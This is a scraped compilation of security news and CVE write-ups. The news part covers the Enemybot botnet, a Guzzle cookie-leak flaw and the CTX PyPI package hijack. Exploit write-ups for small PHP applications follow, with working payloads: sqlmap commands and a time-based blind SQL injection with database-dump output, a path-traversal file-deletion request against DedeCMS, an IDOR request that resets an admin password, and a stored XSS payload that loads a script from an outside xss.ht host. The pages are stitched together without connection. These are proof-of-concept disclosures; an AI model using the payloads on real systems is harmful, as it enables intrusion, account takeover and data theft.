A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).
"The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services

A nascent Linux-based botnet named **Enemybot** has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).

"The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices."

First disclosed by Securonix in March and later by Fortinet, Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ.

Enemybot, which is capable of carrying out DDoS attacks, draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant reveals that it's made up of four different components -

*   A Python module to download dependencies and compile the malware for different OS architectures
*   The core botnet section
*   An obfuscation segment designed to encode and decode the malware's strings, and
*   A command-and-control functionality to receive attack commands and fetch additional payloads

Also incorporated is a new scanner function that's engineered to search random IP addresses associated with public-facing assets for potential vulnerabilities, while also taking into account new bugs within days of them being publicly disclosed.

"In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing \[a\] shell command," the researchers said, pointing to a new "adb\_infect" function. ADB refers to Android Debug Bridge, a command-line utility used to communicate with an Android device.

Besides the Log4Shell vulnerabilities that came to light in December 2021, this includes recently patched flaws in Razer Sila routers (no CVE), VMware Workspace ONE Access (CVE-2022-22954), and F5 BIG-IP (CVE-2022-1388) as well as weaknesses in WordPress plugins like Video Synchro PDF.

Other weaponized security shortcomings are below -

*   **CVE-2022-22947** (CVSS score: 10.0) - A code injection vulnerability in Spring Cloud Gateway
*   **CVE-2021-4039** (CVSS score: 9.8) - A command injection vulnerability in the web interface of the Zyxel
*   **CVE-2022-25075** (CVSS score: 9.8) - A command injection vulnerability in TOTOLink A3000RU wireless router
*   **CVE-2021-36356** (CVSS score: 9.8) - A remote code execution vulnerability in KRAMER VIAware
*   **CVE-2021-35064** (CVSS score: 9.8) - A privilege escalation and command execution vulnerability in Kramer VIAWare
*   **CVE-2020-7961** (CVSS score: 9.8) - A remote code execution vulnerability in Liferay Portal

What's more, the botnet's source code has been shared on GitHub, making it widely available to other threat actors. "I assume no responsibility for any damages caused by this program," the project's README file reads. "This is posted under Apache license and is also considered art."

"Keksec's Enemybot appears to be just starting to spread, however due to the authors' rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,'' the researchers said.

"This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities

The StaffList WordPress plugin before 3.1.5 does not properly sanitise and escape a parameter before using it in a SQL statement when searching for Staff in the admin dashboard, leading to an SQL Injection

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection(Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable Code:$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?...  $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR      LOWER(firstname) LIKE '%{$w}%' OR      LOWER(department)  LIKE '%{$w}%' OR      LOWER(email) LIKE '%{$w}%'" : "");# Vulnerable URLhttp://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]# POC```sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'--cookie="wordpress_cookies_paste_here"```# POC Imagehttps://prnt.sc/AECcFRHhe2ib

CVE-2022-1556: WordPress Stafflist 3.1.2 SQL Injection ≈ Packet Storm

Drupal rolls out update for issue that is contingent on cookie middleware being enabled

Adam Bannister 27 May 2022 at 14:10 UTC

Drupal rolls out update for issue that is contingent on cookie middleware being enabled

The maintainers of Guzzle, the popular HTTP client for PHP applications, have addressed a high severity vulnerability leading to cross-domain cookie leakage.

Drupal, the open source content management system (CMS), is among the applications that use the third-party library and has released software updates addressing the issue.

The flaw resides in Guzzle’s cookie middleware, which is disabled by default, “so most library consumers will not be affected by this issue”, reads a GitHub security advisory published by a Guzzle maintainer on Wednesday (May 25).

**The cookies crumble**

Tracked as CVE-2022-29248, the bug centers on a failure to check if the cookie domain equals the domain of the server which sets the cookie via the Set-Cookie header. This would allow “a malicious server to set cookies for unrelated domains”, continues the advisory.

“For example, an attacker at www.example.com might set a session cookie for api.example.net, logging the Guzzle client into their account and retrieving private API requests from the security log of their account.”

Catch up on the latest PHP security news

Guzzle is used to send HTTP requests from PHP programs for various use-cases.

The PSR-7-compatible library, which is approaching 22,000 stars on GitHub, is also used by Adobe’s e-commerce platform, Magento, among other applications, as well as by Laravel, the popular PHP web application framework.

However, only users that “manually add the cookie middleware to the handler stack or construct the client with are affected”, explained the advisory. They must also use the same Guzzle client to call multiple domains and have redirect forwarding enabled to be vulnerable.

Guzzle maintainers have fixed the flaw in versions 6.5.6, 7.4.3, and 7.5.0, and advised users to ensure cookie middleware is disabled unless cookie support is required.

**Drupal updates**

In a security advisory issued on the same day as its Guzzle counterpart, Drupal said the Guzzle vulnerability “does not affect Drupal core, but may affect some contributed projects or custom code on Drupal sites”.

The issue has been patched in Drupal versions 9.3.14 and 9.2.20, with previous Drupal 9 versions no longer supported. Drupal 7 is not affected by the flaw.

Drupal classified the bug as ‘moderately critical’ on its own severity scale, assigning a score of 13 out of 25.

RECOMMENDED Security ‘researcher’ hits back against claims of malicious CTX file uploads

Patch released for cross-domain cookie leakage flaw in Guzzle

They claim that all data received was deleted

They claim that all data received was deleted

A ‘security researcher’ accused of unethical activity through the alleged hijack of a popular open source project insists that their actions were not malicious.

Last week, as previously reported by _The Daily Swig_, social media users alerted the Python Package Index (PyPI) repository to a potentially malicious or hijacked package, CTX.

**BACKGROUND** Malicious Python library CTX removed from PyPI repo

On May 22, Reddit user SocketPuppets promoted the package online, claiming it had received an update after lying dormant for roughly eight years.

The CTX Python library was available on both GitHub and PyPI. However, it wasn’t long before participants on a Reddit thread highlighted that the GitHub package had not been updated at the same time as the PyPI repository.

To make matters worse, the individual responsible also allegedly compromised a different package, phpass.

Indian hacker Somdev Sangwan said: “Python’s CTX library and a fork of PHP’s phpass have been compromised.’

**Domain takeover**

With an estimated three million downloads combined, the Python packages had been tampered with to send environmental variables – such as AWS keys – to an external URL leading to a Heroku app.

Once alerted to the anomaly, PyPI removed the CTX package, explaining that the exfiltration method had been added after a perpetrator purchased a domain name for the expired email address used by the original developer, sent themselves a recovery password, and took over the account.

Read more of the latest hacking news from around the world

Users who installed the package between May 14 and May 22, 2022, may have had linked environmental variables and credentials compromised.

SocketPuppets (account since deleted) tried to defend their actions, claiming the unusual activity was due to a “new company account”.

The individual accused of the activity, then published a Medium blog post to share their “side of the story”.

“All this research DOES NOT contain any malicious activity,” Aydin said. “I want to show how this simple attack affects +10M users and companies. ALL THE DATA THAT I RECEIVED IS DELETED AND NOT USED.”

**‘Never responsibly disclosed’**

According to Aydin, a ‘scraper tool’ and a bot were used to take over the packages. It cost $5 to register the expired domain.

Aydin added that he sent a report to the bug bounty platform HackerOne on May 15 that was closed as a duplicate a day later.

Their HackerOne profile does not appear to show an associated bug report.

Speaking to _The Daily Swig_, Sangwan said that the vulnerability “was never responsibly disclosed”, and “this was an actual attack”.

Sangwan added: “After taking over the package, the attacker posted about it on Reddit… and when other users started getting suspicious and I discovered another package they had compromised. The attacker came out and claimed that he did it for ‘research’.

“Replacing a popular software with a backdoored version that steals password\[s\] of people is anything but research.”

**YOU MIGHT ALSO LIKE** Volatile market for stolen credit card data shaken up by sanctions against Russia

Security ‘researcher’ hits back against claims of malicious CTX file uploads

DedeCMS v5.7.93 was discovered to contain arbitrary file deletion vulnerability in upload.php via the delete parameter.

Permalink

**Dedecms has Arbitrary file deletion**

*   Affected product: Dedecms 5.7.93
*   Attack type: Remote
*   Affected component: /dede/upload.php
*   Description: DedeCMS v5.7.93 was discovered to contain arbitrary file deletion vulnerability in upload.php via the delete parameter.
*   Comment: The Version 5.93 used to repair Arbitrary file deletion, but there is still a way to bypass

**POC**

You can attack with low administrator privileges

    GET /dede/upload.php?delete=dede/../../../../../../../../../flag HTTP/1.1
    Host: dedecms5793
    Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=5dmda8e360sct3jfhq5bhupfi1; _csrf_name_087a8580=71d08ef049948bbc07ae269bda502532; _csrf_name_087a85801BH21ANI1AGD297L1FF21LN02BGE1DNG=d7b9a721f2afba6c; DedeUserID=3; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=55ecf92b6c33a0e4; DedeLoginTime=1651835206; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=a93eb3d3f937052f; lastCid=1; lastCid1BH21ANI1AGD297L1FF21LN02BGE1DNG=2b4648712e49895f; ENV_GOBACK_URL=%2Fdede%2Fcontent_i_list.php%3Fchannelid%3D2
    
    

**Details**

The Version 5.93 added 17 lines of code.

$delete = preg\_replace("#^(\[.\]\*\[/\]\*)\*#", "", $delete);

It can easily be bypassed by 'dede/../../../../../../../../../flag'

Then at line 34 the file is deleted

CVE-2022-30508: Vulnerability/1.md at master · 1security/Vulnerability

In oretnom23 Automotive Shop Management System v1.0, the name id parameter is vulnerable to IDOR - Broken Access Control allowing attackers to change the admin password(vertical privilege escalation)

**Exploit Title: Automotive Shop Management System v1.0 - Insecure Direct Object Reference(IDOR)****Exploit Author: NS Kumar (n1\_x)****Date: May 6, 2022****Vendor Homepage: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/asms\_0.zip****Tested on: Parrot Linux, Apache, Mysql****Vendor: oretnom23****Version: v1.0****Exploit Description:****Automotive Shop Management System v1.0 suffers from IDOR - Broken Access Control Vulnerability allowing attackers to change the admin password(vertical privilege escalation).**

\---------------------------------------- To Exploit ---------------------------------------------------------

Step 1: Login as a staff user.

Step 2: Goto profile page, you will see your profile information.

Step 3: Click save button intercept the request with burp or zap.

POST /asms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------389134231331641804881591951010
Content-Length: 825
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/asms/admin/?page=user
Cookie: PHPSESSID=pt7bcoi9ubt8dbjh972g56emu1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------389134231331641804881591951010
Content-Disposition: form-data; name="id"

1
-----------------------------389134231331641804881591951010
Content-Disposition: form-data; name="firstname"

Administrator
-----------------------------389134231331641804881591951010
Content-Disposition: form-data; name="lastname"

Admin
-----------------------------389134231331641804881591951010
Content-Disposition: form-data; name="username"

admin
-----------------------------389134231331641804881591951010
Content-Disposition: form-data; name="password"

password123
-----------------------------389134231331641804881591951010
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------389134231331641804881591951010--

step 4: Change the user id to 1 and username to admin and insert your own password in the password field (change first and lastname if you want).

step 5: Forward the request and turn off the proxy.

step 6: Now you can login as Administrator.

CVE-2022-30495: OpenSource/exploit_idor_asms.md at main · nsparker1337/OpenSource

In Hospital-Management-System v1.0, the editid parameter in the doctor.php page is vulnerable to SQL injection attacks.

The editid parameter in the doctor.php page appears to be vulnerable to SQL injection attacks.

    GET /hms/doctor.php?editid=1 HTTP/1.1
    Host: 192.168.74.136
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: PHPSESSID=cpbuir6uql3t0128e61bn2ihm1
    Upgrade-Insecure-Requests: 1

CVE-2022-30516: GitHub - Danie1233/Hospital-Management-System-V1.0-SQLi

In oretnom23 Automotive Shop Management System v1.0, the product id parameter suffers from a blind SQL Injection Vulnerability allowing remote attackers to dump all database credential and gain admin access(privilege escalation).

**Exploit Title: Automotive Shop Management System v1.0 - Blind SQL Injection****Exploit Author: NS Kumar (n1\_x)****Date: May 6, 2022****Vendor Homepage: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/asms\_0.zip****Tested on: Parrot Linux, Apache, Mysql****Vendor: oretnom23****Version: v1.0****Exploit Description:****Automotive Shop Management System v1.0 suffers from blind SQL Injection Vulnerability allowing remote attackers to dump all database credential and gain admin access(privilege escalation).**

\---------------------------------------- To Exploit ---------------------------------------------------------

Step 1: Login as a staff user.

Step 2: Goto Inventory page click action and select view product, you can see url like http://localhost/asms/admin/?page=inventory/view\_details&id=7

Step 3: The id parameter is the vulnerable one. put the payload '+(select\*from(select(sleep(5)))a)+' or copy the url send it to the sqlmap.

step 4: sqlmap query : sqlmap -u http://localhost/asms/admin/?page=inventory/view\_details&id=7 --batch --dbs

step 5: You can Enumerate all database credentials.

**Sample Sqlmap log:**

    sqlmap identified the following injection point(s) with a total of 133 HTTP(s) requests:
    

    Parameter: id (GET)
    	Type: time-based blind
    	Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    	Payload: page=products/view_details&id=1' AND (SELECT 1875 FROM (SELECT(SLEEP(5)))WrPn) AND 'nDbG'='nDbG
    

    web application technology: Apache 2.4.52, PHP 8.1.2
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
    sqlmap resumed the following injection point(s) from stored session:
    

    Parameter: id (GET)
    	Type: time-based blind
    	Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    	Payload: page=products/view_details&id=1' AND (SELECT 1875 FROM (SELECT(SLEEP(5)))WrPn) AND 'nDbG'='nDbG
    

    web application technology: PHP 8.1.2, Apache 2.4.52
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
    

available databases \[16\]: \[_\] information\_schema \[_\] LoginSystem \[_\] mims \[_\] mysql \[_\] asms\_db \[_\] omps\_db \[_\] performance\_schema \[_\] phpmyadmin

    sqlmap resumed the following injection point(s) from stored session:
    

    Parameter: id (GET)
    	Type: time-based blind
    	Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    	Payload: page=products/view_details&id=1' AND (SELECT 1875 FROM (SELECT(SLEEP(5)))WrPn) AND 'nDbG'='nDbG
    

    web application technology: PHP 8.1.2, Apache 2.4.52
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
    sqlmap resumed the following injection point(s) from stored session:
    

    Parameter: id (GET)
    	Type: time-based blind
    	Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    	Payload: page=products/view_details&id=1' AND (SELECT 1875 FROM (SELECT(SLEEP(5)))WrPn) AND 'nDbG'='nDbG
    

    web application technology: PHP 8.1.2, Apache 2.4.52
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
    sqlmap resumed the following injection point(s) from stored session:
    

    Parameter: id (GET)
    	Type: time-based blind
    	Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    	Payload: page=products/view_details&id=1' AND (SELECT 1875 FROM (SELECT(SLEEP(5)))WrPn) AND 'nDbG'='nDbG
    

    web application technology: PHP 8.1.2, Apache 2.4.52
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
    Database: omps_db
    Table: category_list
    [9 entries]
    

\[18:41:24\] \[INFO\] the back-end DBMS is MySQL web application technology: PHP 8.1.2, Apache 2.4.52 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) \[18:41:24\] \[INFO\] fetching tables for database: 'asms\_db' \[18:41:25\] \[INFO\] resumed: 'inventory\_list' \[18:41:25\] \[INFO\] resumed: 'mechanic\_list' \[18:41:25\] \[INFO\] resumed: 'product\_list' \[18:41:25\] \[INFO\] resumed: 'service\_list' \[18:41:25\] \[INFO\] resumed: 'system\_info' \[18:41:25\] \[INFO\] resumed: 'transaction\_list' \[18:41:25\] \[INFO\] resumed: 'transaction\_products' \[18:41:25\] \[INFO\] resumed: 'transaction\_services' \[18:41:25\] \[INFO\] resumed: 'users' Database: asms\_db  
\[9 tables\] +----------------------+ | inventory\_list | | mechanic\_list | | product\_list | | service\_list | | system\_info | | transaction\_list | | transaction\_products | | transaction\_services | | users | +----------------------+ ---------+--------+-------------+-----------------------------------------------------+---------------------+---------------------+

CVE-2022-30493: OpenSource/exploit_sql_asms.md at main · nsparker1337/OpenSource

In oretnom23 Automotive Shop Management System v1.0, the first and last name user fields suffer from a stored XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.

Permalink

main

Switch branches/tags

**OpenSource/**exploit\_xss\_asms.md****

Go to file

*   Go to file

*   Copy path
*   Copy permalink

nsparker1337 Add files via upload

Latest commit 220bbb8 May 6, 2022

**History**

**1** contributor

**Users who have contributed to this file**

Exploit Title: Automotive Shop Management System v1.0 - Stored Cross Site Scripting(XSS) Exploit Author: NS Kumar (n1\_x) Date: May 6, 2022 Vendor Homepage: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/asms\_0.zip Tested on: Parrot Linux, Apache, Mysql Vendor: oretnom23 Version: v1.0 Exploit Description: Automotive Shop Management System v1.0 suffers from stored XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.

23 lines (17 sloc) 1.09 KB

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

**Exploit Title: Automotive Shop Management System v1.0 - Stored Cross Site Scripting(XSS)****Exploit Author: NS Kumar (n1\_x)****Date: May 6, 2022****Vendor Homepage: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/asms\_0.zip****Tested on: Parrot Linux, Apache, Mysql****Vendor: oretnom23****Version: v1.0****Exploit Description:****Automotive Shop Management System v1.0 suffers from stored XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.**

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`To Exploit\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\` Step 1: Goto Profile Page

Step 2: Put XSS Hunter Payload on Either First Name or Last Name field

Step 3: Wait for Admin to view your details

Step 4: Then you will see xss fires alert on xss hunter page

Payload Used for this Exploit: "><script src=https://d4.xss.ht></script>

CVE-2022-30494: OpenSource/exploit_xss_asms.md at main · nsparker1337/OpenSource

A vulnerability classified as problematic has been found in Zoo Management System 1.0. Affected is an unknown function of the file admin/manage-ticket.php. The manipulation with the input <script>alert(1)</script> leads to cross site scripting. It is possible to launch the attack remotely.

Tag

#php